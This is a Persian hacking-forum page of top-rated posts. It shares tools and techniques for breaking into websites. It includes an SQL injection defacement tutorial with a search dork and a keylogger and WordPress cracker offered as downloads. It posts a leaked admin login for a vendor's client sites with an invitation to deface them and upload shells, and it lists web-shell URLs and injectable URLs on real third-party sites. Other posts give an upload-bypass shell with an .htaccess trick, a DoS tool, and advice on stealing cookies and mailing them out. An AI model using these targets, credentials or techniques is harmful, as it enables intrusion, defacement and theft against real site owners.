پرچمداران


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۱۹/۰۱/۱۷ در همه بخش ها

  1. 9 امتیاز
    بسمه تعالی با سلام خدمت کاربران عزیز انجمن گاردایران امروز تصمیم گرفتم که با استفاده از یک دورک و حمله از طریق باگ Sql Injection آموزشی در خصوص نفوذ و دیفیس یک وبسایت خارجی تهیه کنم براتون. ابزار ها رو هم پیوست کردم. به ویدیو دقت کنید. هر سوالی داشتید اینجا تاپیک بذارید تا جواب بدم: http://guardiran.org/forums/forum/19-سوال-و-جواب-های-نفوذ-به-سایت-ها-و-سرورها-و-روشهای-مقابله/ ابزارها : Sqli Dumper Admin Login Finder دورک : Issue.php?categoryID= ویدیو آموزشی و فایل ها در 8 پارت هست رمز عبور : guardiran.org How to Hack a website with Sql Injection - Guardiran Security Team.part04.rar How to Hack a website with Sql Injection - Guardiran Security Team.part01.rar How to Hack a website with Sql Injection - Guardiran Security Team.part02.rar How to Hack a website with Sql Injection - Guardiran Security Team.part03.rar
  2. 8 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز : اسکریپتی که قرار میدم اسکریپت پورت اسکنر هست و فوق العاده ساده و کاربردی و کم حجم به زبان پایتون هست ! تمام پورت های باز یک سایت فقط با وارد کردن ادرس سایت به شما نشون میده ! (البته اینم اضافه کنم نمونه کامل این اسکریپت میشه ابزار قوی انمپ که خب گفتم این هم بزارم برای تازه وارد ها بد نیست) #!/usr/bin/env python import socket import subprocess import sys from datetime import datetime # Clear the screen subprocess.call('clear', shell=True) # Ask for input remoteServer = raw_input("Enter a remote host to scan: ") remoteServerIP = socket.gethostbyname(remoteServer) # Print a nice banner with information on which host we are about to scan print "-" * 60 print "Please wait, scanning remote host", remoteServerIP print "-" * 60 # Check what time the scan started t1 = datetime.now() # Using the range function to specify ports (here it will scans all ports between 1 and 1024) # We also put in some error handling for catching errors try: for port in range(1,1025): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "Port {}: Open".format(port) sock.close() except KeyboardInterrupt: print "You pressed Ctrl+C" sys.exit() except socket.gaierror: print 'Hostname could not be resolved. Exiting' sys.exit() except socket.error: print "Couldn't connect to server" sys.exit() # Checking the time again t2 = datetime.now() # Calculates the difference of time, to see how long it took to run the script total = t2 - t1 # Printing the information to screen print 'Scanning Completed in: ', total اگر استقبال شد اسکریپت های اسکن پشرفته تری میزارم و اگر جایی از کد نیاز به توضیح داشت درخدمتم !
  3. 8 امتیاز
    پارت های 5 الی 8 : How to Hack a website with Sql Injection - Guardiran Security Team.part07.rar How to Hack a website with Sql Injection - Guardiran Security Team.part08.rar How to Hack a website with Sql Injection - Guardiran Security Team.part05.rar How to Hack a website with Sql Injection - Guardiran Security Team.part06.rar
  4. 8 امتیاز
    ############################################ # Title : WebCzech CMS Sql Injection Vulnerability # Author : Guardiran Security Team # category : webapps # Tested On : Win 10 , Kali Linux # Vendor HomePage : https://www.webczech.cz # Google Dork : intext:"e-shop system WebCzech " inurl:/.php?id= ############################################ # PROF: http://www.general-store.cz/static.php?id=5' [Sql injection Vulnerability] http://www.kozena-penezenka.cz/static.php?id=13'[Sql injection Vulnerability] http://eshop.pozarnizbrojnice.cz/static.php?id=1'[Sql injection Vulnerability] http://www.restaurace-retro.cz/eshop/static.php?id=1'[Sql injection Vulnerability] # Discovered by : sir shahroukh ############################################ https://cxsecurity.com/issue/WLB-2019010203 ############################################
  5. 7 امتیاز
    سلام امروز یک کرکر واسه بازی پر طرفدار زولا نوشتم امیدوارم خوشتون بیاد اینم لینک اسکن https://www.virustotal.com/#/file/db1941c76e8dbf710e97f52a98e3e08ad76203c23f146cab9236c53d0131c1e9/detection ZAC.py
  6. 7 امتیاز
    In The Name Of God سلام خدمت دوستان عزیز امروز با آموزش پیدا کردن موقعیت مکانی تارگت از طریق عکس آپلود شده در خدمت شما هستم ! در این آموزش ما با ابزار exiftool آشنا خواهیم شد ! دستور نصب این ابزار در سیستم عامل لینوکس یا کالی لینوکس! apt-get install exiftool آموزش استفاده از ابزار : بعد از نصب کافیه در ترمینال تایپ کنید : exiftool عکس مورد نظر
  7. 7 امتیاز
    با سلام و خسته نباشید خدمت دوستان محترم و مدیران عزیز گفتم از قبل تاپیک به اسم کیلاگر هست دیگه الکی تاپیک جدید ایجاد نکنم ! دوستان یکی از بهترین کیلاگر های زندگیم با کمی ادیت در خدمت شما دوستان قرار میدم که با زبان دوست داشتنی پایتون نوشته شده و امیدوارم مورد قبول واقع بشه ! فقط لطفا قبل از استفاده فایل درباره من مطالعه بشه ! لینک اسکن = Scan Link Xenotix-Python-Keylogger-master.zip
  8. 7 امتیاز
    In The Name Of God ممنون دوستان عزیز خب اینبار یکم تخصصی ترش میکنیم اسکریپت و از گیت هاب میخوام بهتون یه اسکریپت جالب معرفی کنم به نام نت اسکن که همراه با لینک دانلود لینک اسکنش هم قرار میدم لطفا قبل از استفاده فایل درباره من حتما مطالعه کنید ! لینک اسکن : Scan Link Nscan-master.zip
  9. 6 امتیاز
    In The Name Of God اسکریپت کرک پنل وردپرس که خیلی سریعتر از بقیه اسکریپت ها عمل میکنه ! لینک اسکن = Scan Link wp.py
  10. 6 امتیاز
    درود دقیق هدفتون از این کار چیه ؟ باید در نظر داشته باشی که هر سایت به کوکی های هاست و دامنه خودش در مرورگر دسترسی داره ! یعنی صرفا جنبه نفوذ به کلاینت رو نداره ! مگر کد های مخربی بنویسی که سمت کلاینت اجرا بشن . با این تفاسیر : کوکی ها در آرایه سوپر گلوبال کوکی در پی اچ پی ذخیر میشن و می تونی با syntax زیر بهشون دسترسی پیدا کنی $_COOKIE['cookiename'] بعد از اون با استفاده از تابع mail() که در کتابخانه استاندارد پی اچ پی موجود هست می تونی ایمیل ارسال کنی ، لازم به ذکره mail از smtp پیش فرض سرور استفاده میکنه ، برای آپشن های حرفه ای تر میتونی از کتابخانه هایی مثل پی اچ پی میلر و غیره استفاده کنی
  11. 5 امتیاز
    In The Name Of God اسکریپت پروکسی چکر به زبان پایتون و یکی از ساده ترین اسکریپت های موجود هست باز هم اگر جایی نیاز به توضیح داشت بپرسید در خدمتم دوستان ! import requests import bs4 import time from threading import Thread from Queue import Queue import sys def proxy_check(proxy): try: proxy = proxy.rstrip() proxy_judge = "http://www.proxyjudge.info/" # any proxy judge can go here proxyy={"http": "http://"+proxy} r = requests.get(proxy_judge,proxies= proxyy,timeout=10) soup = bs4.BeautifulSoup(r.content,"html.parser") data = soup.find_all("body") for item in data: #Low anonymity if "HTTP_X_FORWARDED_FOR" in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text : if("L" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Low Alive" time.sleep(5.5) #Medium anonymity elif "HTTP_X_FORWARDED_FOR = unknown" in item.text: if("M" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Medium Alive" time.sleep(5.5) # High anonymity elif "HTTP_X_FORWARDED_FOR" not in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text and "REMOTE_ADDR" in item.text : if("H" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " High Alive" time.sleep(5.5) else: time.sleep(5.5) except requests.exceptions.Timeout: time.sleep(.5) #print str(proxy) + " Dead" except: time.sleep(.5) #print str(proxy) + " Dead" time.sleep(.5) def get_proxy(i,q): #print "Starting thread [" + str(i)+"]\n" time.sleep(5) while True: proxy = q.get() # get proxy proxy_check(proxy) q.task_done() if(len(sys.argv) < 4): print("\n\nUsage: programe.py proxy_list.txt output_proxies.txt LMH \n\nType\n L = Low\n M = Med\n H = High\n") else: num_threads = 300 q_queue = Queue() for i in range(num_threads): # number of threads to spin up worker = Thread(target=get_proxy, args=(i,q_queue,)) worker.setDaemon(True) worker.start() with open(sys.argv[1]) as fp: for line in fp: q_queue.put(line) # put list in queue q_queue.join() # wehen queue is empty exit print 'Finished' این هم کل دستورات این اسکریپت و آپشن ها و نحوه فراخوانیش :‌ Usage: programe.py proxy_list.txt output_proxies.txt LMH Type L = Low M = Med H = High
  12. 5 امتیاز
    بیشتر از 150 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : 8426228jerry vendor : https://www.injerry.com/portfolio-web.php?PID=1 vendor : https://www.injerry.com/portfolio-web.php?PID=2 admin page : target/admin/login.php بعضی از تارگت ها : http://shonshenc.com http://www.chapond.com http://www.knowfate.com.tw http://www.hsdiffuser.com
  13. 5 امتیاز
    پروژه PyCk یک کالکسیون از ابزارهای بدرد بخور پایتون در زمینه هکینگ رو در خودش داره البته شاید زیاد ابزارها حرفه ای نباشن چون جنبه آموزشی هم دارن و برای کسایی که میخوان تست نفوذ با پایتون رو یادبگیرن به شدت توصیه میشه... پیشنهاد میکنم یه نگاهی بهش بندازین https://github.com/Naategh/PyCk
  14. 5 امتیاز
    http://www.architecturalpapers.ch/index.php?ID=10
  15. 4 امتیاز
    Black Net.exe 👽 با سلام 👽 🤠 نرم افزار Black Elf 🤠 قابلیت های نرم افزار 🛠️ : 1- گرفتن Public IP با یک کلیک و بسیار سریع . 2- گرفتن Ping از سیستم و نمایش نتیجه . لینک اسکن برنامه 🌐 [کلیک و کشیدن برای جابجایی] برای حمایت از نرم افزار از دکمه Like استفاده کنید .🧡
  16. 4 امتیاز
    http://www.dacheng1971.com.tw/lyadmin/pages/uploads/image/pro_nlsjvu1i58.php http://www.gcomtw.com/lyadmin/pages/uploads/image/New_n2no66hgwe.php http://refined.com.tw/lyadmin/uploads/image/img1_epdo91agin.php http://www.nirey.com.tw/uploads/image/pic_hr0ssbj4fv.php
  17. 4 امتیاز
    سلام وقت بخیر با استفاده از اکستنشن curl در php میتونید با ارسال درخواست به یک سایت کوکی رو دریافت کنید <?php $ch = curl_init('http://www.google.com/'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches); // get cookie $cookies = array(); foreach($matches[1] as $item) { parse_str($item, $cookie); $cookies = array_merge($cookies, $cookie); } var_dump($cookies); ?> برای راحتی میتونید یک فرم با یک تکست باکس بگذارید و وقت سابمیت کردنش توسط متد post یا get مقدار رو به curl_init بدید
  18. 4 امتیاز
    درود اگه به کد نویسی تسلط دارید می تونید حلقه تعریف کنید و توی اون حلقه شرایط خاصی که باید پسورد لیستتون داشته باشه رو در نظر بگیرید با این حال یه سری برنامه password generator از پیش برای این مسائل نوشته شده که می تونید از اون ها هم استفاده کنید و راه حل Common تر : اگر سیستم عامل کالی لینوکس در دسترس دارید می تونید از ابزار crunch برای تولید لیستتون استفاده کنید
  19. 4 امتیاز
    Reza.Black

    ابزار involve

    به نام خدا با سلام با ابزار involve می تونید سرور رو از نظر فعال بودن یا نه و پورت و همین طور بنر مربوطه چک کنید. و یک حمله ی Dos رو بر روی هدف انجام بدید. اساس کار این ابزار این هست که با ارسال هدرهای http به صورت ناقص سعی در باز نگه داشتن اتصال جاری می کنه. (بیش از حالت نرمال) و وب سرور هایی رو با پیکربندی ضعیف تحت تاثیر قرار می ده. البته سرورها و فایروال هایی وجود دارن که بلافاصله این نوع اتصالات رو شناسایی می کنن و مانع از ایجاد ارتباط میشن. و timeout کردن درخواست ها رو بررسی می کنن. این ابزار فقط جنبه تستی داره و فقط هم برای انجمن گارد ایران تهیه کردم. for launch chmod +x involve.sh involve.sh/. involve.rar
  20. 4 امتیاز
    به نام خدا اسکریپت اول : اسکریپت فول کرکر MD5 Md5 Cracker Full.py اسکریئت دوم : اسکریپت تبدیل پسورد به هش passtohash.py اسکریپت سوم : اسکریپت ادمین فایندر تخصصی admin.py اسکریپت چهارم : اسکریپت و کتاب خانه pip get-pip.py اگر مفید واقع شدند باز هم میزارم ! به امید دیدار !
  21. 4 امتیاز
    https://www.solcavsko.info/index.php?id=54'
  22. 4 امتیاز
    http://www.sedimental.com/catalog/index.php?ID=67
  23. 4 امتیاز
    http://www.icdcprague.org/index.php?id=10
  24. 3 امتیاز
    proxy

    بانک شل

    یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐 <FILESMATCH "^.*/.jpg"> SetHandler application/x-httpd-php </FILESMATCH> shell.rar
  25. 3 امتیاز
    https://www.aljyyosh.org/mirror.php?id=221487 http://www.zone-h.org/mirror/id/32174301 اولش نتونستم توی zone-h پیداش کنم. اسپمرها ریختن سر zone-h و لینک هایی رو میدن که یا پاک شده و یا اصلا وجود نداشته. کلی وقت نشستم تا لینک رو از zone-h گرفتم